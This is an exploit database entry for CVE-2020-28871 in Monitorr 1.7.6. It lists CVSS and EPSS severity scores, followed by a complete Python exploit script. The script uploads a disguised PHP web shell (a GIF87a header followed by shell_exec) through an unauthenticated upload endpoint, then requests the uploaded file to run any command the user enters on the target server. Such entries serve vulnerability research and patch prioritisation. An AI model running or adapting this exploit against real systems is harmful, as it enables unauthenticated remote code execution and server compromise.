Achuth V P1337DAY-ID-38201Monitorr 1.7.6 Shell Upload Exploit
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.967 High
EPSS
Percentile
99.4%
# Exploit Title: Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution
# Exploit Author: Achuth V P (retrymp3)
# Vendor Homepage: https://github.com/Monitorr/
# Software Link: https://github.com/Monitorr/Monitorr
# Tested on: Ubuntu
# Version: v1.7.6
# Exploit Description: Monitorr v1.7.6 suffers from unauthenticated file upload to remote code execution vulnerability
# CVE: CVE-2020-28871
import requests
import random
import string
#from requests.auth import HTTPBasicAuth
from colorama import (Fore as F, Back as B, Style as S)
BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def payL():
fileName=''.join(random.choice(string.ascii_lowercase) for i in range(16))+'.php'
tf1=requests.post(url+'/assets/php/upload.php',
files=(
('fileToUpload', (fileName, 'GIF87a\n<?php\n$var=shell_exec('+'"'+cmd+'"'+');\necho "$var"\n?>')),))
tf2=requests.get(url+'/assets/data/usrimg/'+fileName)
print(tf2.text)
def sig():
SIG = SB+FY+" "+FR+".-----..___.._____. "+FY+"\n"
SIG += FY+" | .. >||__-__-_| \n"
SIG += FY+" "+FR+"| |.' ,||_______ "+FY+"\n"
SIG += FY+" | _ < ||__-__-_|"+FR+"* * *"+FY+" \n"
SIG += FY+" | |\ \ ||__-__-_\n"
SIG += FY+" "+FR+"|___ \_ \||_______| "+FY+"\n"
SIG += FY+"\n"+" _____"+FR+"github.com/retrymp3"+FY+"_____\n"+ST
return SIG
def argsetup():
about = SB+FT+'Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution\n'+ST
return about
if __name__ == "__main__":
header = SB+FT+"\n"+' '+FR+'retrymp3\n'+ST
print(header)
print(sig())
print(argsetup())
#proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
url=input("Enter the base url: ")
cmd=input("Command: ")
payL()
Related
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.967 High
EPSS
Percentile
99.4%